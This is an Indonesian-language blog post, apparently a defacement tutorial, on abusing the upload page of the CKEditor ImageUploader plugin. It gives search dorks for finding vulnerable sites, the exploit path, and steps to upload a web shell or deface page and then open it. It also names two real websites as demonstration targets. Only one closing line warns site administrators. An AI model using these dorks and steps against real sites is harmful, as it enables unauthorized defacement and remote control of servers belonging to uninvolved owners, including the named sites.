Deface Vulnerability File Upload di Plugin ImageBrowser

Hii Gess , kali ini gw bakalan share method yang lumayan lama lah . Gw kali ini share karena iseng2 coba nyari web vuln ternyata ke inget method ini hehe :v btw method ini di buat dari team typical idiot security dengan codename SPEEDY-03 pasti pada kenal ea kan .

Oke langsung aja ke tutornya 

Bahan: - Internet Wajib Pastinya !
       - Dork : inurl:/imageuploader/uploads/
                inurl:/imageuploader/uploads/ site:.com
                
       - Exploit : /ckeditor/plugins/imageuploader/imgbrowser.php

Langkah:

1.Dorking dulu kek biasa cok .
2.Pilih salah satu web yang menurutmu vuln .
3.Masukkan exploit nya : localhost/ckeditor/plugins/imageuploader/imgbrowser.php
4.Setelah itu serahlu Upshell atau UpSC Deface
5.Akses ? localhost/[Path]/ckeditor/plugins/imageuploader/uploads/

Note: Engga Semua Web Vuln !

Demo:- https://www.rastarita.com/assets/ckeditor/plugins/imageuploader/imgbrowser.php
             - https://www.marcelocosta.org/css_js/plugins/ckeditor/plugins/imageuploader/imgbrowser.php

Sekian dari gw , Untuk admin selalu hati-hati dengan plugin uploader, karena attacker bisa meremote server anda melalui shell upload .

Share this post

Berlangganan update artikel terbaru via email: